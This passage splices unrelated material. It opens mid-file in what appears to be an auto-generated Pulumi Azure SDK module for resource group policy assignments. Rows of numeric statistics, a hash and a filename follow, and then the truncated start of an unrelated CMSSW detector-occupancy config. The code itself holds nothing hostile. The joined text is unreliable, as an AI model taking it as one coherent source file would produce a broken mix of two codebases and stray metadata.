pulumi.set(__self__, "identity", identity)
if location is not None:
pulumi.set(__self__, "location", location)
if metadata is not None:
pulumi.set(__self__, "metadata", metadata)
if name is not None:
pulumi.set(__self__, "name", name)
if non_compliance_messages is not None:
pulumi.set(__self__, "non_compliance_messages", non_compliance_messages)
if not_scopes is not None:
pulumi.set(__self__, "not_scopes", not_scopes)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter(name="policyDefinitionId")
def policy_definition_id(self) -> pulumi.Input[str]:
"""
The ID of the Policy Definition or Policy Definition Set. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "policy_definition_id")
@policy_definition_id.setter
def policy_definition_id(self, value: pulumi.Input[str]):
pulumi.set(self, "policy_definition_id", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> pulumi.Input[str]:
"""
The ID of the Resource Group where this Policy Assignment should be created. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_id", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description which should be used for this Policy Assignment.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The Display Name for this Policy Assignment.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def enforce(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies if this Policy should be enforced or not?
"""
return pulumi.get(self, "enforce")
@enforce.setter
def enforce(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enforce", value)
@property
@pulumi.getter
def identity(self) -> Optional[pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs']]:
"""
An `identity` block as defined below.
"""
return pulumi.get(self, "identity")
@identity.setter
def identity(self, value: Optional[pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs']]):
pulumi.set(self, "identity", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The Azure Region where the Policy Assignment should exist. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def metadata(self) -> Optional[pulumi.Input[str]]:
"""
A JSON mapping of any Metadata for this Policy.
"""
return pulumi.get(self, "metadata")
@metadata.setter
def metadata(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "metadata", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this Policy Assignment. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="nonComplianceMessages")
def non_compliance_messages(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]]:
"""
One or more `non_compliance_message` blocks as defined below.
"""
return pulumi.get(self, "non_compliance_messages")
@non_compliance_messages.setter
def non_compliance_messages(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]]):
pulumi.set(self, "non_compliance_messages", value)
@property
@pulumi.getter(name="notScopes")
def not_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies a list of Resource Scopes (for example a Subscription, or a Resource Group) within this Management Group which are excluded from this Policy.
"""
return pulumi.get(self, "not_scopes")
@not_scopes.setter
def not_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "not_scopes", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[str]]:
"""
A JSON mapping of any Parameters for this Policy. Changing this forces a new Management Group Policy Assignment to be created.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class _ResourceGroupPolicyAssignmentState:
def __init__(__self__, *,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
enforce: Optional[pulumi.Input[bool]] = None,
identity: Optional[pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs']] = None,
location: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
non_compliance_messages: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]] = None,
not_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
parameters: Optional[pulumi.Input[str]] = None,
policy_definition_id: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None):
"""
Input properties used for looking up and filtering ResourceGroupPolicyAssignment resources.
:param pulumi.Input[str] description: A description which should be used for this Policy Assignment.
:param pulumi.Input[str] display_name: The Display Name for this Policy Assignment.
:param pulumi.Input[bool] enforce: Specifies if this Policy should be enforced or not?
:param pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs'] identity: An `identity` block as defined below.
:param pulumi.Input[str] location: The Azure Region where the Policy Assignment should exist. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] metadata: A JSON mapping of any Metadata for this Policy.
:param pulumi.Input[str] name: The name which should be used for this Policy Assignment. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]] non_compliance_messages: One or more `non_compliance_message` blocks as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] not_scopes: Specifies a list of Resource Scopes (for example a Subscription, or a Resource Group) within this Management Group which are excluded from this Policy.
:param pulumi.Input[str] parameters: A JSON mapping of any Parameters for this Policy. Changing this forces a new Management Group Policy Assignment to be created.
:param pulumi.Input[str] policy_definition_id: The ID of the Policy Definition or Policy Definition Set. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] resource_group_id: The ID of the Resource Group where this Policy Assignment should be created. Changing this forces a new Policy Assignment to be created.
"""
if description is not None:
pulumi.set(__self__, "description", description)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if enforce is not None:
pulumi.set(__self__, "enforce", enforce)
if identity is not None:
pulumi.set(__self__, "identity", identity)
if location is not None:
pulumi.set(__self__, "location", location)
if metadata is not None:
pulumi.set(__self__, "metadata", metadata)
if name is not None:
pulumi.set(__self__, "name", name)
if non_compliance_messages is not None:
pulumi.set(__self__, "non_compliance_messages", non_compliance_messages)
if not_scopes is not None:
pulumi.set(__self__, "not_scopes", not_scopes)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if policy_definition_id is not None:
pulumi.set(__self__, "policy_definition_id", policy_definition_id)
if resource_group_id is not None:
pulumi.set(__self__, "resource_group_id", resource_group_id)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
A description which should be used for this Policy Assignment.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The Display Name for this Policy Assignment.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter
def enforce(self) -> Optional[pulumi.Input[bool]]:
"""
Specifies if this Policy should be enforced or not?
"""
return pulumi.get(self, "enforce")
@enforce.setter
def enforce(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enforce", value)
@property
@pulumi.getter
def identity(self) -> Optional[pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs']]:
"""
An `identity` block as defined below.
"""
return pulumi.get(self, "identity")
@identity.setter
def identity(self, value: Optional[pulumi.Input['ResourceGroupPolicyAssignmentIdentityArgs']]):
pulumi.set(self, "identity", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The Azure Region where the Policy Assignment should exist. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def metadata(self) -> Optional[pulumi.Input[str]]:
"""
A JSON mapping of any Metadata for this Policy.
"""
return pulumi.get(self, "metadata")
@metadata.setter
def metadata(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "metadata", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The name which should be used for this Policy Assignment. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="nonComplianceMessages")
def non_compliance_messages(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]]:
"""
One or more `non_compliance_message` blocks as defined below.
"""
return pulumi.get(self, "non_compliance_messages")
@non_compliance_messages.setter
def non_compliance_messages(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]]):
pulumi.set(self, "non_compliance_messages", value)
@property
@pulumi.getter(name="notScopes")
def not_scopes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies a list of Resource Scopes (for example a Subscription, or a Resource Group) within this Management Group which are excluded from this Policy.
"""
return pulumi.get(self, "not_scopes")
@not_scopes.setter
def not_scopes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "not_scopes", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[str]]:
"""
A JSON mapping of any Parameters for this Policy. Changing this forces a new Management Group Policy Assignment to be created.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="policyDefinitionId")
def policy_definition_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Policy Definition or Policy Definition Set. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "policy_definition_id")
@policy_definition_id.setter
def policy_definition_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "policy_definition_id", value)
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Resource Group where this Policy Assignment should be created. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "resource_group_id")
@resource_group_id.setter
def resource_group_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_id", value)
class ResourceGroupPolicyAssignment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
enforce: Optional[pulumi.Input[bool]] = None,
identity: Optional[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentIdentityArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
non_compliance_messages: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]]] = None,
not_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
parameters: Optional[pulumi.Input[str]] = None,
policy_definition_id: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a Resource Group Policy Assignment.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_definition = azure.policy.Definition("exampleDefinition",
policy_type="Custom",
mode="All",
policy_rule=\"\"\" {
"if": {
"not": {
"field": "location",
"equals": "westeurope"
}
},
"then": {
"effect": "Deny"
}
}
\"\"\")
example_resource_group_policy_assignment = azure.core.ResourceGroupPolicyAssignment("exampleResourceGroupPolicyAssignment",
resource_group_id=example_resource_group.id,
policy_definition_id=example_definition.id,
parameters=\"\"\" "tagName": {
"value": "Business Unit"
},
"tagValue": {
"value": "BU"
}
\"\"\")
```
## Import
Resource Group Policy Assignments can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:core/resourceGroupPolicyAssignment:ResourceGroupPolicyAssignment example /subscriptions/00000000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Authorization/policyAssignments/assignment1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: A description which should be used for this Policy Assignment.
:param pulumi.Input[str] display_name: The Display Name for this Policy Assignment.
:param pulumi.Input[bool] enforce: Specifies if this Policy should be enforced or not?
:param pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentIdentityArgs']] identity: An `identity` block as defined below.
:param pulumi.Input[str] location: The Azure Region where the Policy Assignment should exist. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] metadata: A JSON mapping of any Metadata for this Policy.
:param pulumi.Input[str] name: The name which should be used for this Policy Assignment. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]] non_compliance_messages: One or more `non_compliance_message` blocks as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] not_scopes: Specifies a list of Resource Scopes (for example a Subscription, or a Resource Group) within this Management Group which are excluded from this Policy.
:param pulumi.Input[str] parameters: A JSON mapping of any Parameters for this Policy. Changing this forces a new Management Group Policy Assignment to be created.
:param pulumi.Input[str] policy_definition_id: The ID of the Policy Definition or Policy Definition Set. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] resource_group_id: The ID of the Resource Group where this Policy Assignment should be created. Changing this forces a new Policy Assignment to be created.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ResourceGroupPolicyAssignmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Resource Group Policy Assignment.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_definition = azure.policy.Definition("exampleDefinition",
policy_type="Custom",
mode="All",
policy_rule=\"\"\" {
"if": {
"not": {
"field": "location",
"equals": "westeurope"
}
},
"then": {
"effect": "Deny"
}
}
\"\"\")
example_resource_group_policy_assignment = azure.core.ResourceGroupPolicyAssignment("exampleResourceGroupPolicyAssignment",
resource_group_id=example_resource_group.id,
policy_definition_id=example_definition.id,
parameters=\"\"\" "tagName": {
"value": "Business Unit"
},
"tagValue": {
"value": "BU"
}
\"\"\")
```
## Import
Resource Group Policy Assignments can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:core/resourceGroupPolicyAssignment:ResourceGroupPolicyAssignment example /subscriptions/00000000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Authorization/policyAssignments/assignment1
```
:param str resource_name: The name of the resource.
:param ResourceGroupPolicyAssignmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ResourceGroupPolicyAssignmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
enforce: Optional[pulumi.Input[bool]] = None,
identity: Optional[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentIdentityArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
non_compliance_messages: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]]] = None,
not_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
parameters: Optional[pulumi.Input[str]] = None,
policy_definition_id: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ResourceGroupPolicyAssignmentArgs.__new__(ResourceGroupPolicyAssignmentArgs)
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["enforce"] = enforce
__props__.__dict__["identity"] = identity
__props__.__dict__["location"] = location
__props__.__dict__["metadata"] = metadata
__props__.__dict__["name"] = name
__props__.__dict__["non_compliance_messages"] = non_compliance_messages
__props__.__dict__["not_scopes"] = not_scopes
__props__.__dict__["parameters"] = parameters
if policy_definition_id is None and not opts.urn:
raise TypeError("Missing required property 'policy_definition_id'")
__props__.__dict__["policy_definition_id"] = policy_definition_id
if resource_group_id is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_id'")
__props__.__dict__["resource_group_id"] = resource_group_id
super(ResourceGroupPolicyAssignment, __self__).__init__(
'azure:core/resourceGroupPolicyAssignment:ResourceGroupPolicyAssignment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
enforce: Optional[pulumi.Input[bool]] = None,
identity: Optional[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentIdentityArgs']]] = None,
location: Optional[pulumi.Input[str]] = None,
metadata: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
non_compliance_messages: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]]] = None,
not_scopes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
parameters: Optional[pulumi.Input[str]] = None,
policy_definition_id: Optional[pulumi.Input[str]] = None,
resource_group_id: Optional[pulumi.Input[str]] = None) -> 'ResourceGroupPolicyAssignment':
"""
Get an existing ResourceGroupPolicyAssignment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: A description which should be used for this Policy Assignment.
:param pulumi.Input[str] display_name: The Display Name for this Policy Assignment.
:param pulumi.Input[bool] enforce: Specifies if this Policy should be enforced or not?
:param pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentIdentityArgs']] identity: An `identity` block as defined below.
:param pulumi.Input[str] location: The Azure Region where the Policy Assignment should exist. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] metadata: A JSON mapping of any Metadata for this Policy.
:param pulumi.Input[str] name: The name which should be used for this Policy Assignment. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ResourceGroupPolicyAssignmentNonComplianceMessageArgs']]]] non_compliance_messages: One or more `non_compliance_message` blocks as defined below.
:param pulumi.Input[Sequence[pulumi.Input[str]]] not_scopes: Specifies a list of Resource Scopes (for example a Subscription, or a Resource Group) within this Management Group which are excluded from this Policy.
:param pulumi.Input[str] parameters: A JSON mapping of any Parameters for this Policy. Changing this forces a new Management Group Policy Assignment to be created.
:param pulumi.Input[str] policy_definition_id: The ID of the Policy Definition or Policy Definition Set. Changing this forces a new Policy Assignment to be created.
:param pulumi.Input[str] resource_group_id: The ID of the Resource Group where this Policy Assignment should be created. Changing this forces a new Policy Assignment to be created.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _ResourceGroupPolicyAssignmentState.__new__(_ResourceGroupPolicyAssignmentState)
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["enforce"] = enforce
__props__.__dict__["identity"] = identity
__props__.__dict__["location"] = location
__props__.__dict__["metadata"] = metadata
__props__.__dict__["name"] = name
__props__.__dict__["non_compliance_messages"] = non_compliance_messages
__props__.__dict__["not_scopes"] = not_scopes
__props__.__dict__["parameters"] = parameters
__props__.__dict__["policy_definition_id"] = policy_definition_id
__props__.__dict__["resource_group_id"] = resource_group_id
return ResourceGroupPolicyAssignment(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def description(self) -> pulumi.Output[Optional[str]]:
"""
A description which should be used for this Policy Assignment.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[Optional[str]]:
"""
The Display Name for this Policy Assignment.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter
def enforce(self) -> pulumi.Output[Optional[bool]]:
"""
Specifies if this Policy should be enforced or not?
"""
return pulumi.get(self, "enforce")
@property
@pulumi.getter
def identity(self) -> pulumi.Output[Optional['outputs.ResourceGroupPolicyAssignmentIdentity']]:
"""
An `identity` block as defined below.
"""
return pulumi.get(self, "identity")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The Azure Region where the Policy Assignment should exist. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def metadata(self) -> pulumi.Output[str]:
"""
A JSON mapping of any Metadata for this Policy.
"""
return pulumi.get(self, "metadata")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name which should be used for this Policy Assignment. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="nonComplianceMessages")
def non_compliance_messages(self) -> pulumi.Output[Optional[Sequence['outputs.ResourceGroupPolicyAssignmentNonComplianceMessage']]]:
"""
One or more `non_compliance_message` blocks as defined below.
"""
return pulumi.get(self, "non_compliance_messages")
@property
@pulumi.getter(name="notScopes")
def not_scopes(self) -> pulumi.Output[Optional[Sequence[str]]]:
"""
Specifies a list of Resource Scopes (for example a Subscription, or a Resource Group) within this Management Group which are excluded from this Policy.
"""
return pulumi.get(self, "not_scopes")
@property
@pulumi.getter
def parameters(self) -> pulumi.Output[Optional[str]]:
"""
A JSON mapping of any Parameters for this Policy. Changing this forces a new Management Group Policy Assignment to be created.
"""
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="policyDefinitionId")
def policy_definition_id(self) -> pulumi.Output[str]:
"""
The ID of the Policy Definition or Policy Definition Set. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "policy_definition_id")
@property
@pulumi.getter(name="resourceGroupId")
def resource_group_id(self) -> pulumi.Output[str]:
"""
The ID of the Resource Group where this Policy Assignment should be created. Changing this forces a new Policy Assignment to be created.
"""
return pulumi.get(self, "resource_group_id")
| 48.577689
| 236
| 0.669127
| 4,095
| 36,579
| 5.797802
| 0.05348
| 0.086176
| 0.070171
| 0.061157
| 0.909485
| 0.898324
| 0.885098
| 0.879496
| 0.875158
| 0.860669
| 0
| 0.002181
| 0.235463
| 36,579
| 752
| 237
| 48.642287
| 0.846778
| 0.368244
| 0
| 0.823961
| 1
| 0
| 0.133703
| 0.066354
| 0
| 0
| 0
| 0
| 0
| 1
| 0.163814
| false
| 0.002445
| 0.017115
| 0
| 0.278729
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
d4d903ba7366f0caaec2992dae31fb08dd18a825
| 70,948
|
py
|
Python
|
DPGAnalysis/SiStripTools/python/occupancyplotsselections_cff.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 852
|
2015-01-11T21:03:51.000Z
|
2022-03-25T21:14:00.000Z
|
DPGAnalysis/SiStripTools/python/occupancyplotsselections_cff.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 30,371
|
2015-01-02T00:14:40.000Z
|
2022-03-31T23:26:05.000Z
|
DPGAnalysis/SiStripTools/python/occupancyplotsselections_cff.py
|
ckamtsikis/cmssw
|
ea19fe642bb7537cbf58451dcf73aa5fd1b66250
|
[
"Apache-2.0"
] | 3,240
|
2015-01-02T05:53:18.000Z
|
2022-03-31T17:24:21.000Z
|
import FWCore.ParameterSet.Config as cms
OccupancyPlotsPixelWantedSubDets = cms.VPSet (
cms.PSet(detSelection=cms.uint32(111),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12010004")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(112),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12010008")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(113),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x1201000c")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(114),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12010010")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(115),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12010014")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(116),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12010018")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(117),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x1201001c")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(118),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12010020")), # BPix L1 mod 1#
cms.PSet(detSelection=cms.uint32(121),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12020004")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(122),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12020008")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(123),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x1202000c")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(124),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12020010")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(125),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12020014")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(126),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12020018")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(127),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x1202001c")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(128),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12020020")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(131),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12030004")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(132),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12030008")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(133),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x1203000c")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(134),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12030010")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(135),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12030014")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(136),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12030018")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(137),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x1203001c")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(138),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1e0f00fc-0x12030020")), # BPix L1 mod 1
cms.PSet(detSelection=cms.uint32(211),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14810104")), # FPix minus
cms.PSet(detSelection=cms.uint32(212),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14810204")), # FPix minus
cms.PSet(detSelection=cms.uint32(213),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14810108")), # FPix minus
cms.PSet(detSelection=cms.uint32(214),detLabel=cms.string("Dummy"),selection=cms.untracked.vstring("0x1f8f03fc-0x14810208")), # FPix minus
